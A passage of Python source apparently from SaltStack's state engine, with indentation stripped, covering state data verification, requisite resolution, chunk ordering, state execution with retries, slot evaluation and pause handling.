_reload_modules = False
if data.get("reload_grains", False):
log.debug("Refreshing grains...")
self.opts["grains"] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get("reload_pillar", False):
log.debug("Refreshing pillar...")
self.opts["pillar"] = self._gather_pillar()
_reload_modules = True
if not ret["changes"]:
if data.get("force_reload_modules", False):
self.module_refresh()
return
if data.get("reload_modules", False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if data["state"] == "file":
if data["fun"] == "managed":
if data["name"].endswith((".py", ".pyx", ".pyo", ".pyc", ".so")):
self.module_refresh()
elif data["fun"] == "recurse":
self.module_refresh()
elif data["fun"] == "symlink":
if "bin" in data["name"]:
self.module_refresh()
elif data["state"] in ("pkg", "ports"):
self.module_refresh()
def verify_data(self, data):
"""
Verify the data, return an error statement if something is wrong
"""
errors = []
if "state" not in data:
errors.append('Missing "state" data')
if "fun" not in data:
errors.append('Missing "fun" data')
if "name" not in data:
errors.append('Missing "name" data')
if data["name"] and not isinstance(data["name"], six.string_types):
errors.append(
"ID '{0}' {1}is not formed as a string, but is a {2}".format(
data["name"],
"in SLS '{0}' ".format(data["__sls__"])
if "__sls__" in data
else "",
type(data["name"]).__name__,
)
)
if errors:
return errors
full = data["state"] + "." + data["fun"]
if full not in self.states:
if "__sls__" in data:
errors.append(
"State '{0}' was not found in SLS '{1}'".format(
full, data["__sls__"]
)
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append("Reason: {0}".format(reason))
else:
errors.append("Specified state '{0}' was not found".format(full))
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
"Missing parameter {0} for state {1}".format(
aspec.args[ind], full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ""
if "require" in data:
reqdec = "require"
if "watch" in data:
# Check to see if the service has a mod_watch function, if it does
# not, then just require
# to just require extend the require statement with the contents
# of watch so that the mod_watch function is not called and the
# requisite capability is still used
if "{0}.mod_watch".format(data["state"]) not in self.states:
if "require" in data:
data["require"].extend(data.pop("watch"))
else:
data["require"] = data.pop("watch")
reqdec = "require"
else:
reqdec = "watch"
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data["state"] == reqfirst:
if fnmatch.fnmatch(data["name"], req[reqfirst]) or fnmatch.fnmatch(
data["__id__"], req[reqfirst]
):
err = (
"Recursive require detected in SLS {0} for"
" require {1} in ID {2}"
).format(data["__sls__"], req, data["__id__"])
errors.append(err)
return errors
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in six.iteritems(high):
try:
if name.startswith("__"):
continue
except AttributeError:
pass
if not isinstance(name, six.string_types):
errors.append(
"ID '{0}' in SLS '{1}' is not formed as a string, but "
"is a {2}. It may need to be quoted.".format(
name, body["__sls__"], type(name).__name__
)
)
if not isinstance(body, dict):
err = "The type {0} in {1} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if body[state] is None:
errors.append(
"ID '{0}' in SLS '{1}' contains a short declaration "
"({2}) with a trailing colon. When not passing any "
"arguments to a state, the colon must be omitted.".format(
name, body["__sls__"], state
)
)
continue
if not isinstance(body[state], list):
errors.append(
"State '{0}' in SLS '{1}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, six.string_types):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{0}" in state '
'"{1}" in SLS "{2}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == "names":
if not isinstance(arg[argfirst], list):
errors.append(
"The 'names' argument in state "
"'{0}' in SLS '{1}' needs to be "
"formed as a list".format(name, body["__sls__"])
)
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
"The {0} statement in state '{1}' in "
"SLS '{2}' needs to be formed as a "
"list".format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = OrderedDict(state=state)
for req in arg[argfirst]:
if isinstance(req, six.string_types):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {0}"
" in SLS {1} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{0}' "
"in state '{1}', in SLS "
"'{2}'. Requisite types must "
"not contain dots, did you "
"mean '{3}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{0}", '
"please check your syntax.\n"
).format(req_val)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{0}" ID "{1}" ID "{2}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
"Multiple dictionaries defined in "
"argument of state '{0}' in SLS '{1}'".format(
name, body["__sls__"]
)
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
"No function declared in state '{0}' in SLS '{1}'".format(
state, body["__sls__"]
)
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{0}' in "
"SLS '{1}'".format(state, body["__sls__"])
)
return errors
def verify_chunks(self, chunks):
"""
Verify the chunks in a list of low data structures
"""
err = []
for chunk in chunks:
err.extend(self.verify_data(chunk))
return err
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high, orchestration_jid=None):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
for state, run in six.iteritems(body):
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if orchestration_jid is not None:
chunk["__orchestration_jid__"] = orchestration_jid
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, six.string_types):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in six.iteritems(arg):
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
elif key == "state":
# Don't pass down a state override
continue
elif key == "name" and not isinstance(
val, six.string_types
):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(six.iterkeys(entry))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order += 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
"""
Pull the extend data and add it to the respective high data
"""
errors = []
if "__extend__" not in high:
return high, errors
ext = high.pop("__extend__")
for ext_chunk in ext:
for name, body in six.iteritems(ext_chunk):
if name not in high:
state_type = next(x for x in body if not x.startswith("__"))
# Check for a matching 'name' override in high data
ids = find_name(name, state_type, high)
if len(ids) != 1:
errors.append(
"Cannot extend ID '{0}' in '{1}:{2}'. It is not "
"part of the high state.\n"
"This is likely due to a missing include statement "
"or an incorrectly typed ID.\nEnsure that a "
"state with an ID of '{0}' is available\nin "
"environment '{1}' and to SLS '{2}'".format(
name,
body.get("__env__", "base"),
body.get("__sls__", "base"),
)
)
continue
else:
name = ids[0][0]
for state, run in six.iteritems(body):
if state.startswith("__"):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, six.string_types) and isinstance(
high[name][state][hind], six.string_types
):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(
high[name][state][hind], dict
):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(
arg[argfirst]
)
# otherwise, its not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (
argfirst == "name"
and next(iter(high[name][state][hind])) == "names"
):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, six.string_types):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(six.iterkeys(exc))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in six.iteritems(high):
if name.startswith("__"):
continue
sls = body.get("__sls__", "")
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
"""
Extend the data reference with requisite_in arguments
"""
req_in = {
"require_in",
"watch_in",
"onfail_in",
"onchanges_in",
"use",
"use_in",
"prereq",
"prereq_in",
}
req_in_all = req_in.union(
{"require", "watch", "onfail", "onfail_stop", "onchanges"}
)
extend = {}
errors = []
for id_, body in six.iteritems(high):
if not isinstance(body, dict):
continue
for state, run in six.iteritems(body):
if state.startswith("__"):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
rkey = key.split("_")[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in six.iteritems(items):
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = OrderedDict()
if "." in _state:
errors.append(
"Invalid requisite in {0}: {1} for "
"{2}, in SLS '{3}'. Requisites must "
"not contain dots, did you mean '{4}'?".format(
rkey,
_state,
name,
body["__sls__"],
_state[: _state.find(".")],
)
)
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if next(iter(extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
if isinstance(items, list):
# Formed as a list of requisite additions
hinges = []
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
if ind in high:
_ind_high = [
x
for x in high[ind]
if not x.startswith("__")
]
ind = {_ind_high[0]: ind}
else:
found = False
for _id in iter(high):
for state in [
state
for state in iter(high[_id])
if not state.startswith("__")
]:
for j in iter(high[_id][state]):
if (
isinstance(j, dict)
and "name" in j
):
if j["name"] == ind:
ind = {state: _id}
found = True
if not found:
continue
if len(ind) < 1:
continue
pstate = next(iter(ind))
pname = ind[pstate]
if pstate == "sls":
# Expand hinges here
hinges = find_sls_ids(pname, high)
else:
hinges.append((pname, pstate))
if "." in pstate:
errors.append(
"Invalid requisite in {0}: {1} for "
"{2}, in SLS '{3}'. Requisites must "
"not contain dots, did you mean '{4}'?".format(
rkey,
pstate,
pname,
body["__sls__"],
pstate[: pstate.find(".")],
)
)
pstate = pstate.split(".")[0]
for tup in hinges:
name, _state = tup
if key == "prereq_in":
# Add prerequired to origin
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{"prerequired": [{_state: name}]}
)
if key == "prereq":
# Add prerequired to prereqs
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
extend[ext_id][_req_state].append(
{"prerequired": [{state: id_}]}
)
continue
if key == "use_in":
# Add the running states args to the
# use_in states
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(six.iterkeys(arg)) == "name":
continue
if next(six.iterkeys(arg)) == "names":
continue
extend[ext_id][_req_state].append(arg)
continue
if key == "use":
# Add the use state's args to the
# running state
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_req_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(six.iterkeys(arg)) == "name":
continue
if next(six.iterkeys(arg)) == "names":
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = OrderedDict()
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if (
next(iter(extend[name][_state][ind]))
== rkey
):
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
high["__extend__"] = []
for key, val in six.iteritems(extend):
high["__extend__"].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
def _call_parallel_target(self, name, cdata, low):
"""
The target function to call that will create the parallel thread/process
"""
# we need to re-record start/end duration here because it is impossible to
# correctly calculate further down the chain
utc_start_time = datetime.datetime.utcnow()
tag = _gen_tag(low)
try:
ret = self.states[cdata["full"]](*cdata["args"], **cdata["kwargs"])
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {0}".format(trb),
}
utc_finish_time = datetime.datetime.utcnow()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
troot = os.path.join(self.opts["cachedir"], self.jid)
tfile = os.path.join(troot, salt.utils.hashutils.sha1_digest(tag))
if not os.path.isdir(troot):
try:
os.makedirs(troot)
except OSError:
# Looks like the directory was created between the check
# and the attempt, we are safe to pass
pass
with salt.utils.files.fopen(tfile, "wb+") as fp_:
fp_.write(msgpack_serialize(ret))
def call_parallel(self, cdata, low):
"""
Call the state defined in the given cdata in parallel
"""
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
proc = salt.utils.process.Process(
target=self._call_parallel_target, args=(name, cdata, low)
)
proc.start()
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Started in a separate process",
"proc": proc,
}
return ret
@salt.utils.decorators.state.OutputUnifier("content_check", "unify")
def call(self, low, chunks=None, running=None, retries=1):
"""
Call a state directly with the low data structure, verify data
before processing.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
log.info(
"Running state [%s] at time %s",
low["name"].strip()
if isinstance(low["name"], six.string_types)
else low["name"],
local_start_time.time().isoformat(),
)
errors = self.verify_data(low)
if errors:
ret = {
"result": False,
"name": low["name"],
"changes": {},
"comment": "",
}
for err in errors:
ret["comment"] += "{0}\n".format(err)
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {"result": False, "name": low["name"], "changes": {}}
self.state_con["runas"] = low.get("runas", None)
if low["state"] == "cmd" and "password" in low:
self.state_con["runas_password"] = low["password"]
else:
self.state_con["runas_password"] = low.get("runas_password", None)
if not low.get("__prereq__"):
log.info(
"Executing state %s.%s for [%s]",
low["state"],
low["fun"],
low["name"].strip()
if isinstance(low["name"], six.string_types)
else low["name"],
)
if "provider" in low:
self.load_modules(low)
state_func_name = "{0[state]}.{0[fun]}".format(low)
cdata = salt.utils.args.format_call(
self.states[state_func_name],
low,
initial_ret={"full": state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS,
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
"__low__": immutabletypes.freeze(low),
"__running__": immutabletypes.freeze(running) if running else {},
"__instance_id__": self.instance_id,
"__lowstate__": immutabletypes.freeze(chunks) if chunks else {},
}
if "__env__" in low:
inject_globals["__env__"] = six.text_type(low["__env__"])
if self.inject_globals:
inject_globals.update(self.inject_globals)
if low.get("__prereq__"):
test = sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]
sys.modules[self.states[cdata["full"]].__module__].__opts__["test"] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
# allows the state to be overridden(we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
if (
"unless" in low
and "{0[state]}.mod_run_check".format(low) not in self.states
) or (
"onlyif" in low
and "{0[state]}.mod_run_check".format(low) not in self.states
):
ret.update(self._run_check(low))
if not self.opts.get("lock_saltenv", False):
# NOTE: Overriding the saltenv when lock_saltenv is blocked in
# salt/modules/state.py, before we ever get here, but this
# additional check keeps use of the State class outside of the
# salt/modules/state.py from getting around this setting.
if "saltenv" in low:
inject_globals["__env__"] = six.text_type(low["saltenv"])
elif isinstance(cdata["kwargs"].get("env", None), six.string_types):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals["__env__"] = six.text_type(cdata["kwargs"]["env"])
if "__env__" not in inject_globals:
# Let's use the default environment
inject_globals["__env__"] = "base"
if "__orchestration_jid__" in low:
inject_globals["__orchestration_jid__"] = low["__orchestration_jid__"]
if "result" not in ret or ret["result"] is False:
self.states.inject_globals = inject_globals
if self.mocked:
ret = mock_ret(cdata)
else:
# Execute the state function
if not low.get("__prereq__") and low.get("parallel"):
# run the state call in parallel, but only if not in a prereq
ret = self.call_parallel(cdata, low)
else:
self.format_slots(cdata)
ret = self.states[cdata["full"]](
*cdata["args"], **cdata["kwargs"]
)
self.states.inject_globals = {}
if (
"check_cmd" in low
and "{0[state]}.mod_run_check_cmd".format(low) not in self.states
):
ret.update(self._run_check_cmd(low))
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {0}".format(trb),
}
finally:
if low.get("__prereq__"):
sys.modules[self.states[cdata["full"]].__module__].__opts__[
"test"
] = test
self.state_con.pop("runas", None)
self.state_con.pop("runas_password", None)
if not isinstance(ret, dict):
return ret
# If format_call got any warnings, let's show them to the user
if "warnings" in cdata:
ret.setdefault("warnings", []).extend(cdata["warnings"])
if "provider" in low:
self.load_modules()
if low.get("__prereq__"):
low["__prereq__"] = False
return ret
ret["__sls__"] = low.get("__sls__")
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
utc_finish_time = datetime.datetime.utcnow()
timezone_delta = datetime.datetime.utcnow() - datetime.datetime.now()
local_finish_time = utc_finish_time - timezone_delta
local_start_time = utc_start_time - timezone_delta
ret["start_time"] = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
ret["__id__"] = low["__id__"]
log.info(
"Completed state [%s] at time %s (duration_in_ms=%s)",
low["name"].strip()
if isinstance(low["name"], six.string_types)
else low["name"],
local_finish_time.time().isoformat(),
duration,
)
if "retry" in low:
low["retry"] = self.verify_retry_data(low["retry"])
if not sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]:
if low["retry"]["until"] != ret["result"]:
if low["retry"]["attempts"] > retries:
interval = low["retry"]["interval"]
if low["retry"]["splay"] != 0:
interval = interval + random.randint(
0, low["retry"]["splay"]
)
log.info(
"State result does not match retry until value, "
"state will be re-run in %s seconds",
interval,
)
self.functions["test.sleep"](interval)
retry_ret = self.call(low, chunks, running, retries=retries + 1)
orig_ret = ret
ret = retry_ret
ret["comment"] = "\n".join(
[
(
'Attempt {0}: Returned a result of "{1}", '
'with the following comment: "{2}"'.format(
retries, orig_ret["result"], orig_ret["comment"]
)
),
"" if not ret["comment"] else ret["comment"],
]
)
ret["duration"] = (
ret["duration"] + orig_ret["duration"] + (interval * 1000)
)
if retries == 1:
ret["start_time"] = orig_ret["start_time"]
else:
ret["comment"] = " ".join(
[
"" if not ret["comment"] else ret["comment"],
(
"The state would be retried every {1} seconds "
"(with a splay of up to {3} seconds) "
"a maximum of {0} times or until a result of {2} "
"is returned"
).format(
low["retry"]["attempts"],
low["retry"]["interval"],
low["retry"]["until"],
low["retry"]["splay"],
),
]
)
return ret
def __eval_slot(self, slot):
log.debug("Evaluating slot: %s", slot)
fmt = slot.split(":", 2)
if len(fmt) != 3:
log.warning("Malformed slot: %s", slot)
return slot
if fmt[1] != "salt":
log.warning("Malformed slot: %s", slot)
log.warning(
"Only execution modules are currently supported in slots. This means slot "
'should start with "__slot__:salt:"'
)
return slot
fun, args, kwargs = salt.utils.args.parse_function(fmt[2])
if not fun or fun not in self.functions:
log.warning("Malformed slot: %s", slot)
log.warning(
"Execution module should be specified in a function call format: "
"test.arg('arg', kw='kwarg')"
)
return slot
log.debug("Calling slot: %s(%s, %s)", fun, args, kwargs)
slot_return = self.functions[fun](*args, **kwargs)
# Given input __slot__:salt:test.arg(somekey="value").not.exist ~ /appended
# slot_text should be __slot...).not.exist
# append_data should be ~ /appended
slot_text = fmt[2].split("~")[0]
append_data = fmt[2].split("~", 1)[1:]
log.debug("slot_text: %s", slot_text)
log.debug("append_data: %s", append_data)
# Support parsing slot dict response
# return_get should result in a kwargs.nested.dict path by getting
# everything after first closing paren: )
return_get = None
try:
return_get = slot_text[slot_text.rindex(")") + 1 :]
except ValueError:
pass
if return_get:
# remove first period
return_get = return_get.split(".", 1)[1].strip()
log.debug("Searching slot result %s for %s", slot_return, return_get)
slot_return = salt.utils.data.traverse_dict_and_list(
slot_return, return_get, default=None, delimiter="."
)
if append_data:
if isinstance(slot_return, six.string_types):
# Append text to slot string result
append_data = " ".join(append_data).strip()
log.debug("appending to slot result: %s", append_data)
slot_return += append_data
else:
log.error("Ignoring slot append, slot result is not a string")
return slot_return
def format_slots(self, cdata):
"""
Read in the arguments from the low level slot syntax to make a last
minute runtime call to gather relevant data for the specific routine
Will parse strings, first level of dictionary values, and strings and
first level dict values inside of lists
"""
# __slot__:salt.cmd.run(foo, bar, baz=qux)
SLOT_TEXT = "__slot__:"
ctx = (("args", enumerate(cdata["args"])), ("kwargs", cdata["kwargs"].items()))
for atype, avalues in ctx:
for ind, arg in avalues:
arg = salt.utils.data.decode(arg, keep=True)
if isinstance(arg, dict):
# Search dictionary values for __slot__:
for key, value in arg.items():
try:
if value.startswith(SLOT_TEXT):
log.trace("Slot processsing dict value %s", value)
cdata[atype][ind][key] = self.__eval_slot(value)
except AttributeError:
# Not a string/slot
continue
elif isinstance(arg, list):
for idx, listvalue in enumerate(arg):
log.trace("Slot processing list value: %s", listvalue)
if isinstance(listvalue, dict):
# Search dict values in list for __slot__:
for key, value in listvalue.items():
try:
if value.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested dict value %s",
value,
)
cdata[atype][ind][idx][key] = self.__eval_slot(
value
)
except AttributeError:
# Not a string/slot
continue
if isinstance(listvalue, six.text_type):
# Search strings in a list for __slot__:
if listvalue.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested string %s", listvalue
)
cdata[atype][ind][idx] = self.__eval_slot(listvalue)
elif isinstance(arg, six.text_type) and arg.startswith(SLOT_TEXT):
# Search strings for __slot__:
log.trace("Slot processsing %s", arg)
cdata[atype][ind] = self.__eval_slot(arg)
else:
# Not a slot, skip it
continue
def verify_retry_data(self, retry_data):
"""
verifies the specified retry data
"""
retry_defaults = {
"until": True,
"attempts": 2,
"splay": 0,
"interval": 30,
}
expected_data = {
"until": bool,
"attempts": int,
"interval": int,
"splay": int,
}
validated_retry_data = {}
if isinstance(retry_data, dict):
for expected_key, value_type in six.iteritems(expected_data):
if expected_key in retry_data:
if isinstance(retry_data[expected_key], value_type):
validated_retry_data[expected_key] = retry_data[expected_key]
else:
log.warning(
"An invalid value was passed for the retry %s, "
"using default value '%s'",
expected_key,
retry_defaults[expected_key],
)
validated_retry_data[expected_key] = retry_defaults[
expected_key
]
else:
validated_retry_data[expected_key] = retry_defaults[expected_key]
else:
log.warning(
(
"State is set to retry, but a valid dict for retry "
"configuration was not found. Using retry defaults"
)
)
validated_retry_data = retry_defaults
return validated_retry_data
def call_chunks(self, chunks):
"""
Iterate over a list of chunks and call them, checking for requires.
"""
# Check for any disabled states
disabled = {}
if "state_runs_disabled" in self.opts["grains"]:
for low in chunks[:]:
state_ = "{0}.{1}".format(low["state"], low["fun"])
for pat in self.opts["grains"]["state_runs_disabled"]:
if fnmatch.fnmatch(state_, pat):
comment = (
'The state function "{0}" is currently disabled by "{1}", '
"to re-enable, run state.enable {1}."
).format(state_, pat,)
_tag = _gen_tag(low)
disabled[_tag] = {
"changes": {},
"result": False,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
chunks.remove(low)
break
running = {}
for low in chunks:
if "__FAILHARD__" in running:
running.pop("__FAILHARD__")
return running
tag = _gen_tag(low)
if tag not in running:
# Check if this low chunk is paused
action = self.check_pause(low)
if action == "kill":
break
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
while True:
if self.reconcile_procs(running):
break
time.sleep(0.01)
ret = dict(list(disabled.items()) + list(running.items()))
return ret
def check_failhard(self, low, running):
"""
Check if the low data chunk should send a failhard signal
"""
tag = _gen_tag(low)
if self.opts.get("test", False):
return False
if low.get("failhard", self.opts["failhard"]) and tag in running:
if running[tag]["result"] is None:
return False
return not running[tag]["result"]
return False
def check_pause(self, low):
"""
Check to see if this low chunk has been paused
"""
if not self.jid:
# Can't pause on salt-ssh since we can't track continuous state
return
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
start = time.time()
if os.path.isfile(pause_path):
try:
while True:
tries = 0
with salt.utils.files.fopen(pause_path, "rb") as fp_:
try:
pdat = msgpack_deserialize(fp_.read())
except salt.utils.msgpack.exceptions.UnpackValueError:
# Reading race condition
if tries > 10:
# Break out if there are a ton of read errors
return
tries += 1
time.sleep(1)
continue
id_ = low["__id__"]
key = ""
if id_ in pdat:
key = id_
elif "__all__" in pdat:
key = "__all__"
if key:
if "duration" in pdat[key]:
now = time.time()
if now - start > pdat[key]["duration"]:
return "run"
if "kill" in pdat[key]:
return "kill"
else:
return "run"
time.sleep(1)
